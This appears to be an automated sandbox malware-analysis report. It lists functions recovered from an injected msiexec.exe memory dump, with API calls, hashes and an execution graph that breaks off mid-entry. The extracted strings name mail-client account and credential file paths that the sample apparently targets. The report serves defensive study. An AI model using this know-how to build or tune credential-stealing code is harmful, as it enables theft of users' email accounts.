                                                    • Snapshot File: hcaresult_11_2_232d0000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastValue___vcrt_
                                                    • String ID:
                                                    • API String ID: 3852720340-0
                                                    • Opcode ID: 140c21923045ef47f35d6d4212322b93657b572904d53805fecafabe8d0ba0c8
                                                    • Instruction ID: 63ca312247d5a4c933c7cfbdb60da7b3029b3793cc5e53e78a1d2937f04ae622
                                                    • Opcode Fuzzy Hash: 140c21923045ef47f35d6d4212322b93657b572904d53805fecafabe8d0ba0c8
                                                    • Instruction Fuzzy Hash: 9901283360871E6DE2103679FE899162758EF6577372042FAE314D40D2EF95E8804304
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,232D6C6C), ref: 232D5AFA
                                                    • _free.LIBCMT ref: 232D5B2D
                                                    • _free.LIBCMT ref: 232D5B55
                                                    • SetLastError.KERNEL32(00000000,?,?,232D6C6C), ref: 232D5B62
                                                    • SetLastError.KERNEL32(00000000,?,?,232D6C6C), ref: 232D5B6E
                                                    • _abort.LIBCMT ref: 232D5B74
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2787297967.00000000232D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 232D0000, based on PE: true
                                                    • Associated: 0000000B.00000002.2787256687.00000000232D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2787297967.00000000232E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_232d0000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$_free$_abort
                                                    • String ID:
                                                    • API String ID: 3160817290-0
                                                    • Opcode ID: 4eca486fad98de0fb14d9ed0b0841f4a28691cb1ec0af8d486a5a1fb463ce979
                                                    • Instruction ID: 7d1881dc752959e94bdd945e7fb32d5a2a899882f884551c36a941ed90305479
                                                    • Opcode Fuzzy Hash: 4eca486fad98de0fb14d9ed0b0841f4a28691cb1ec0af8d486a5a1fb463ce979
                                                    • Instruction Fuzzy Hash: 8BF0C837504B0DBAD21236346C09E0E266E8FF2A72F3841E5F91496185FFF4A9C24164
                                                    APIs
                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\System32\msiexec.exe,00000104), ref: 232D4C1D
                                                    • _free.LIBCMT ref: 232D4CE8
                                                    • _free.LIBCMT ref: 232D4CF2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2787297967.00000000232D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 232D0000, based on PE: true
                                                    • Associated: 0000000B.00000002.2787256687.00000000232D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2787297967.00000000232E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_232d0000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: _free$FileModuleName
                                                    • String ID: C:\Windows\System32\msiexec.exe$x}
                                                    • API String ID: 2506810119-3238982547
                                                    • Opcode ID: 21d074861e0fd6f62dc6f1dca6ce055285da7e8372adbfa307947149a32575e6
                                                    • Instruction ID: 0ad47f25c2253eef224cc5ee02698010246348fa3f90dd9e4f0a45c0e6863241
                                                    • Opcode Fuzzy Hash: 21d074861e0fd6f62dc6f1dca6ce055285da7e8372adbfa307947149a32575e6
                                                    • Instruction Fuzzy Hash: CB317372B0031DAFDB25DF998D85D9EBBFCEB95310F1440D6E90497200DBB5AA81CB50
                                                    APIs
                                                      • Part of subcall function 232D1E89: lstrlenW.KERNEL32(?,?,?,?,?,232D10DF,?,?,?,00000000), ref: 232D1E9A
                                                      • Part of subcall function 232D1E89: lstrcatW.KERNEL32(?,?,?,232D10DF,?,?,?,00000000), ref: 232D1EAC
                                                      • Part of subcall function 232D1E89: lstrlenW.KERNEL32(?,?,232D10DF,?,?,?,00000000), ref: 232D1EB3
                                                      • Part of subcall function 232D1E89: lstrlenW.KERNEL32(?,?,232D10DF,?,?,?,00000000), ref: 232D1EC8
                                                      • Part of subcall function 232D1E89: lstrcatW.KERNEL32(?,232D10DF,?,232D10DF,?,?,?,00000000), ref: 232D1ED3
                                                    • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 232D122A
                                                      • Part of subcall function 232D173A: _strlen.LIBCMT ref: 232D1855
                                                      • Part of subcall function 232D173A: _strlen.LIBCMT ref: 232D1869
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2787297967.00000000232D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 232D0000, based on PE: true
                                                    • Associated: 0000000B.00000002.2787256687.00000000232D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2787297967.00000000232E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_232d0000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                    • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                    • API String ID: 4036392271-1520055953
                                                    • Opcode ID: e822b659052e76288da5a875d1c88518ee0df111ed1e56dbfe7e2dcdefab9900
                                                    • Instruction ID: 19080228b6a760a24e53521d38f893d6f6f777e6c7211b68e44066bae49b73cd
                                                    • Opcode Fuzzy Hash: e822b659052e76288da5a875d1c88518ee0df111ed1e56dbfe7e2dcdefab9900
                                                    • Instruction Fuzzy Hash: D721C57AE103286AE7249790EC82FEE7339EF94714F400596F604EB1D0E6B13DC28758
                                                    APIs
                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,232D4AEA,?,?,232D4A8A,?,232E2238,0000000C,232D4BBD,00000000,00000000), ref: 232D4B59
                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 232D4B6C
                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,232D4AEA,?,?,232D4A8A,?,232E2238,0000000C,232D4BBD,00000000,00000000,?,232D2082), ref: 232D4B8F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2787297967.00000000232D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 232D0000, based on PE: true
                                                    • Associated: 0000000B.00000002.2787256687.00000000232D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2787297967.00000000232E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_232d0000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                    • String ID: CorExitProcess$mscoree.dll
                                                    • API String ID: 4061214504-1276376045
                                                    • Opcode ID: cb3a6dd8c54ccc07d38cfd522e95907c5a4e99f56462259a4915cb9e4ace950f
                                                    • Instruction ID: 0172736b1160b74c761c57e598a4bc075f01b350ab752839bdc12377cb16aaa4
                                                    • Opcode Fuzzy Hash: cb3a6dd8c54ccc07d38cfd522e95907c5a4e99f56462259a4915cb9e4ace950f
                                                    • Instruction Fuzzy Hash: 27F03C32E0060CAFDB15AB90DC09BADBFB9EF55752F0081A5E905A6150DB349991CA94
                                                    APIs
                                                    • GetEnvironmentStringsW.KERNEL32 ref: 232D715C
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 232D717F
                                                      • Part of subcall function 232D56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 232D5702
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 232D71A5
                                                    • _free.LIBCMT ref: 232D71B8
                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 232D71C7
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2787297967.00000000232D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 232D0000, based on PE: true
                                                    • Associated: 0000000B.00000002.2787256687.00000000232D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2787297967.00000000232E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_232d0000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                    • String ID:
                                                    • API String ID: 336800556-0
                                                    • Opcode ID: ccb8a8fb5cc3795ae7d2452d9ea0af7f0668da22537d6bcb61e83704cd914b6c
                                                    • Instruction ID: 7277ff35d2f33bcd92a1a9f35577f370608c82d6e9f4413a792dbf94477dabad
                                                    • Opcode Fuzzy Hash: ccb8a8fb5cc3795ae7d2452d9ea0af7f0668da22537d6bcb61e83704cd914b6c
                                                    • Instruction Fuzzy Hash: DB018873A0161E7B63112EBE5C4CD7B7B6DDED3E6131542AABD04C7200EAA8DC41D1B4
                                                    APIs
                                                    • GetLastError.KERNEL32(00000000,?,00000000,232D636D,232D5713,00000000,?,232D2249,?,?,232D1D66,00000000,?,?,00000000), ref: 232D5B7F
                                                    • _free.LIBCMT ref: 232D5BB4
                                                    • _free.LIBCMT ref: 232D5BDB
                                                    • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 232D5BE8
                                                    • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 232D5BF1
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2787297967.00000000232D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 232D0000, based on PE: true
                                                    • Associated: 0000000B.00000002.2787256687.00000000232D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2787297967.00000000232E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_232d0000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$_free
                                                    • String ID:
                                                    • API String ID: 3170660625-0
                                                    • Opcode ID: 232212ac23af9c809029c268ba5fad168cf14e3b144da3e88d4a1cb11e5537a6
                                                    • Instruction ID: efa96038e6891722d9fec82b8990e4a3a8ecac1c93fe213687fa3fbd6975e8b2
                                                    • Opcode Fuzzy Hash: 232212ac23af9c809029c268ba5fad168cf14e3b144da3e88d4a1cb11e5537a6
                                                    • Instruction Fuzzy Hash: 7B01F437104B0EBBD31276346C88D1F2A6EDFE267273400E9F9159618AEFF9E9824164
                                                    APIs
                                                    • lstrlenW.KERNEL32(?,?,?,?,?,232D10DF,?,?,?,00000000), ref: 232D1E9A
                                                    • lstrcatW.KERNEL32(?,?,?,232D10DF,?,?,?,00000000), ref: 232D1EAC
                                                    • lstrlenW.KERNEL32(?,?,232D10DF,?,?,?,00000000), ref: 232D1EB3
                                                    • lstrlenW.KERNEL32(?,?,232D10DF,?,?,?,00000000), ref: 232D1EC8
                                                    • lstrcatW.KERNEL32(?,232D10DF,?,232D10DF,?,?,?,00000000), ref: 232D1ED3
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2787297967.00000000232D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 232D0000, based on PE: true
                                                    • Associated: 0000000B.00000002.2787256687.00000000232D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2787297967.00000000232E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_232d0000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: lstrlen$lstrcat
                                                    • String ID:
                                                    • API String ID: 493641738-0
                                                    • Opcode ID: f459b658de1e7efcede13f1c57f4d78d31eb072c29d8a9a8d05fe8316f7bc907
                                                    • Instruction ID: e9570061e38cde9d29b4f75bed8138a1b883cfd4b90b6fc9bdae8c3424f6978c
                                                    • Opcode Fuzzy Hash: f459b658de1e7efcede13f1c57f4d78d31eb072c29d8a9a8d05fe8316f7bc907
                                                    • Instruction Fuzzy Hash: CEF0E9275402187AD2213719EC89E7F777CEFC6B21B54401AF60883180DB54685382F5
                                                    APIs
                                                    • _free.LIBCMT ref: 232D91D0
                                                      • Part of subcall function 232D571E: HeapFree.KERNEL32(00000000,00000000,?,232D924F,?,00000000,?,00000000,?,232D9276,?,?,?,?,232D7E5A,?), ref: 232D5734
                                                      • Part of subcall function 232D571E: GetLastError.KERNEL32(?,?,232D924F,?,00000000,?,00000000,?,232D9276,?,?,?,?,232D7E5A,?,?), ref: 232D5746
                                                    • _free.LIBCMT ref: 232D91E2
                                                    • _free.LIBCMT ref: 232D91F4
                                                    • _free.LIBCMT ref: 232D9206
                                                    • _free.LIBCMT ref: 232D9218
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2787297967.00000000232D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 232D0000, based on PE: true
                                                    • Associated: 0000000B.00000002.2787256687.00000000232D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2787297967.00000000232E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_232d0000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: 242365712543463ced770f760132701b1e217bacc9c2cef39c70296ba0f710b6
                                                    • Instruction ID: 9e53672ddaf39eaaa15a1d09fe68c9cfd8135063082c5de81651c32a5776481d
                                                    • Opcode Fuzzy Hash: 242365712543463ced770f760132701b1e217bacc9c2cef39c70296ba0f710b6
                                                    • Instruction Fuzzy Hash: C9F06273514249978620FB58DEC9C167BEDEB20721B745885FA09E7548CBB4F8C08E54
                                                    APIs
                                                      • Part of subcall function 232D7153: GetEnvironmentStringsW.KERNEL32 ref: 232D715C
                                                      • Part of subcall function 232D7153: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 232D717F
                                                      • Part of subcall function 232D7153: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 232D71A5
                                                      • Part of subcall function 232D7153: _free.LIBCMT ref: 232D71B8
                                                      • Part of subcall function 232D7153: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 232D71C7
                                                    • _free.LIBCMT ref: 232D4F1D
                                                    • _free.LIBCMT ref: 232D4F24
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2787297967.00000000232D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 232D0000, based on PE: true
                                                    • Associated: 0000000B.00000002.2787256687.00000000232D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2787297967.00000000232E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_232d0000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                    • String ID: p7~$p7~
                                                    • API String ID: 400815659-1921174232
                                                    • Opcode ID: adfb121ff9497251dc086f7bb9c150075c65f03391d6f00bc54e2fb3e7fa585d
                                                    • Instruction ID: 4d916aa4a811e13173f3f043c66e7c26c972a3d5570dfe4dedc41ff03bfa443c
                                                    • Opcode Fuzzy Hash: adfb121ff9497251dc086f7bb9c150075c65f03391d6f00bc54e2fb3e7fa585d
                                                    • Instruction Fuzzy Hash: 30E02B13B0964D56E17A62796D84E2E16084FE2236F7013C5DD24DF1C1DEE4E4C100E5
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,232D6FFD,00000000,?,00000020,00000100,?,5EFC4D8B,00000000), ref: 232D8731
                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?), ref: 232D87BA
                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 232D87CC
                                                    • __freea.LIBCMT ref: 232D87D5
                                                      • Part of subcall function 232D56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 232D5702
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2787297967.00000000232D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 232D0000, based on PE: true
                                                    • Associated: 0000000B.00000002.2787256687.00000000232D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2787297967.00000000232E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_232d0000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                    • String ID:
                                                    • API String ID: 2652629310-0
                                                    • Opcode ID: de1fab0eed9db1c41127cb5641cadca0f115247b3ac15d242ab6d337f253df63
                                                    • Instruction ID: 9b631dade7c44ef0a4244a5321ab2b45454b7ca3397eef2a0ebe0bda5dfee2ae
                                                    • Opcode Fuzzy Hash: de1fab0eed9db1c41127cb5641cadca0f115247b3ac15d242ab6d337f253df63
                                                    • Instruction Fuzzy Hash: 4A31D037A0021EABEF249F64CC84EAF3BA5EF54B10F1541A8ED04DB190E735D990CB90
                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(232DC7DD), ref: 232DC7E6
                                                    • GetModuleHandleA.KERNEL32(?,232DC7DD), ref: 232DC838
                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 232DC860
                                                      • Part of subcall function 232DC803: GetProcAddress.KERNEL32(00000000,232DC7F4), ref: 232DC804
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2787297967.00000000232D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 232D0000, based on PE: true
                                                    • Associated: 0000000B.00000002.2787256687.00000000232D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2787297967.00000000232E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_232d0000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID:
                                                    • API String ID: 1646373207-0
                                                    • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                    • Instruction ID: cccbfe8cda267426b75206063bb9d5a1f135a00805b79b6cb22a675fa1a8ced4
                                                    • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                    • Instruction Fuzzy Hash: B001261398537A38AA2362747C04DAA9FDC9B27660B1837D6E240C6093C9A085C2C3A9
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,232D1D66,00000000,00000000,?,232D5C88,232D1D66,00000000,00000000,00000000,?,232D5E85,00000006,FlsSetValue), ref: 232D5D13
                                                    • GetLastError.KERNEL32(?,232D5C88,232D1D66,00000000,00000000,00000000,?,232D5E85,00000006,FlsSetValue,232DE190,FlsSetValue,00000000,00000364,?,232D5BC8), ref: 232D5D1F
                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,232D5C88,232D1D66,00000000,00000000,00000000,?,232D5E85,00000006,FlsSetValue,232DE190,FlsSetValue,00000000), ref: 232D5D2D
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2787297967.00000000232D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 232D0000, based on PE: true
                                                    • Associated: 0000000B.00000002.2787256687.00000000232D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2787297967.00000000232E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_232d0000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad$ErrorLast
                                                    • String ID:
                                                    • API String ID: 3177248105-0
                                                    • Opcode ID: 769cac9df882238d43445287278b5eafc7158732b304381554e9d4f6a9fbf1b9
                                                    • Instruction ID: 836347f1c31e77d3d1242926dec14e6cdcaa1a621590c56b3801465d1520dc85
                                                    • Opcode Fuzzy Hash: 769cac9df882238d43445287278b5eafc7158732b304381554e9d4f6a9fbf1b9
                                                    • Instruction Fuzzy Hash: 7E014733A1562FABC3116E289C4CE46375CEF427A2B344660FA09D7144C774D891CAF0
                                                    APIs
                                                    • _free.LIBCMT ref: 232D655C
                                                      • Part of subcall function 232D62BC: IsProcessorFeaturePresent.KERNEL32(00000017,232D62AB,00000000,?,?,?,?,00000016,?,?,232D62B8,00000000,00000000,00000000,00000000,00000000), ref: 232D62BE
                                                      • Part of subcall function 232D62BC: GetCurrentProcess.KERNEL32(C0000417), ref: 232D62E0
                                                      • Part of subcall function 232D62BC: TerminateProcess.KERNEL32(00000000), ref: 232D62E7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2787297967.00000000232D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 232D0000, based on PE: true
                                                    • Associated: 0000000B.00000002.2787256687.00000000232D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2787297967.00000000232E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_232d0000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                    • String ID: *?$.
                                                    • API String ID: 2667617558-3972193922
                                                    • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                    • Instruction ID: a7f9a68ed98aec3b4fdc26ed67e5176644b9d2b2c99fe1d9623e7ca2e9cae5a7
                                                    • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                    • Instruction Fuzzy Hash: 6E51B576E0020E9FDB14DFA8CC80AADB7F9EF58314F6441A9D454E7344D675AA818B50
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2787297967.00000000232D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 232D0000, based on PE: true
                                                    • Associated: 0000000B.00000002.2787256687.00000000232D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2787297967.00000000232E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_232d0000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: _strlen
                                                    • String ID: : $Se.
                                                    • API String ID: 4218353326-4089948878
                                                    • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                    • Instruction ID: b278f787310eb4a56fe0747c171b3ae78c9e0f316054501cb483bbdc854a5b57
                                                    • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                    • Instruction Fuzzy Hash: CE11C476A00349AEDB14DFA89C40BDDFBFCAF19204F144096E545E7222E6B06A428765
                                                    APIs
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 232D2903
                                                      • Part of subcall function 232D35D2: RaiseException.KERNEL32(?,?,?,232D2925,00000000,00000000,00000000,?,?,?,?,?,232D2925,?,232E21B8), ref: 232D3632
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 232D2920
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2787297967.00000000232D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 232D0000, based on PE: true
                                                    • Associated: 0000000B.00000002.2787256687.00000000232D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2787297967.00000000232E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_232d0000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: Exception@8Throw$ExceptionRaise
                                                    • String ID: Unknown exception
                                                    • API String ID: 3476068407-410509341
                                                    • Opcode ID: 3685a794f9339b51440b3ecca7456cf589e0ef5c358cecd3ddcec8c0ea7b8686
                                                    • Instruction ID: 949a8023b48e3ca2d2825b074f5be87a6ca1783e33581710c36c21e75e8d7e84
                                                    • Opcode Fuzzy Hash: 3685a794f9339b51440b3ecca7456cf589e0ef5c358cecd3ddcec8c0ea7b8686
                                                    • Instruction Fuzzy Hash: ABF0283792030EB78B04B6A4FC4899D336C9F10650B9041F0FA65D6491EF71FAD6C5D0
                                                    APIs
                                                    • GetOEMCP.KERNEL32(00000000,?,?,232D6C7C,?), ref: 232D6A1E
                                                    • GetACP.KERNEL32(00000000,?,?,232D6C7C,?), ref: 232D6A35
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2787297967.00000000232D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 232D0000, based on PE: true
                                                    • Associated: 0000000B.00000002.2787256687.00000000232D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2787297967.00000000232E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_232d0000_msiexec.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: |l-#
                                                    • API String ID: 0-3274562017
                                                    • Opcode ID: 898c178c189771d58b8e52696e04c360881504ae4c77dd10bbe9082c09bc9e95
                                                    • Instruction ID: 042de442ca3cf0659de3021887e672e2ccab85501d5f8945f3d749feea341bf1
                                                    • Opcode Fuzzy Hash: 898c178c189771d58b8e52696e04c360881504ae4c77dd10bbe9082c09bc9e95
                                                    • Instruction Fuzzy Hash: FDF08C3291010D8BD700EBA4C84976C3774FB5033AF5883C4E5688A1C1DB76A9858B41

                                                    Execution Graph

                                                    Execution Coverage:5.7%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:1.3%
                                                    Total number of Nodes:2000
                                                    Total number of Limit Nodes:73
                                                    execution_graph 40289 441819 40292 430737 40289->40292 40291 441825 40293 430756 40292->40293 40294 43076d 40292->40294 40295 430774 40293->40295 40296 43075f 40293->40296 40294->40291 40307 43034a memcpy 40295->40307 40306 4169a7 11 API calls 40296->40306 40299 4307ce 40300 430819 memset 40299->40300 40308 415b2c 11 API calls 40299->40308 40300->40294 40301 43077e 40301->40294 40301->40299 40304 4307fa 40301->40304 40303 4307e9 40303->40294 40303->40300 40309 4169a7 11 API calls 40304->40309 40306->40294 40307->40301 40308->40303 40309->40294 37678 442ec6 19 API calls 37852 4152c6 malloc 37853 4152e2 37852->37853 37854 4152ef 37852->37854 37856 416760 11 API calls 37854->37856 37856->37853 37857 4466f4 37876 446904 37857->37876 37859 446700 GetModuleHandleA 37862 446710 __set_app_type __p__fmode __p__commode 37859->37862 37861 4467a4 37863 4467ac __setusermatherr 37861->37863 37864 4467b8 37861->37864 37862->37861 37863->37864 37877 4468f0 _controlfp 37864->37877 37866 4467bd _initterm __wgetmainargs _initterm 37867 44681e GetStartupInfoW 37866->37867 37868 446810 37866->37868 37870 446866 GetModuleHandleA 37867->37870 37878 41276d 37870->37878 37874 446896 exit 37875 44689d _cexit 37874->37875 37875->37868 37876->37859 37877->37866 37879 41277d 37878->37879 37921 4044a4 LoadLibraryW 37879->37921 37881 412785 37913 412789 37881->37913 37929 414b81 37881->37929 37884 4127c8 37935 412465 memset ??2@YAPAXI 37884->37935 37886 4127ea 37947 40ac21 37886->37947 37891 412813 37965 40dd07 memset 37891->37965 37892 412827 37970 40db69 memset 37892->37970 37896 412822 37992 4125b6 ??3@YAXPAX DeleteObject 37896->37992 37897 40ada2 _wcsicmp 37898 41283d 37897->37898 37898->37896 37901 412863 CoInitialize 37898->37901 37975 41268e 37898->37975 37900 412966 37993 40b1ab free free 37900->37993 37991 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37901->37991 37905 41296f 37994 40b633 37905->37994 37907 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37912 412957 CoUninitialize 37907->37912 37918 4128ca 37907->37918 37912->37896 37913->37874 37913->37875 37914 4128d0 TranslateAcceleratorW 37915 412941 GetMessageW 37914->37915 37914->37918 37915->37912 37915->37914 37916 412909 IsDialogMessageW 37916->37915 37916->37918 37917 4128fd IsDialogMessageW 37917->37915 37917->37916 37918->37914 37918->37916 37918->37917 37919 41292b TranslateMessage DispatchMessageW 37918->37919 37920 41291f IsDialogMessageW 37918->37920 37919->37915 37920->37915 37920->37919 37922 4044cf GetProcAddress 37921->37922 37925 4044f7 37921->37925 37923 4044e8 FreeLibrary 37922->37923 37926 4044df 37922->37926 37924 4044f3 37923->37924 37923->37925 37924->37925 37927 404507 MessageBoxW 37925->37927 37928 40451e 37925->37928 37926->37923 37927->37881 37928->37881 37930 414b8a 37929->37930 37931 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37929->37931 37998 40a804 memset 37930->37998 37931->37884 37934 414b9e GetProcAddress 37934->37931 37937 4124e0 37935->37937 37936 412505 ??2@YAPAXI 37938 41251c 37936->37938 37941 412521 37936->37941 37937->37936 38020 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37938->38020 38009 444722 37941->38009 37946 41259b wcscpy 37946->37886 38025 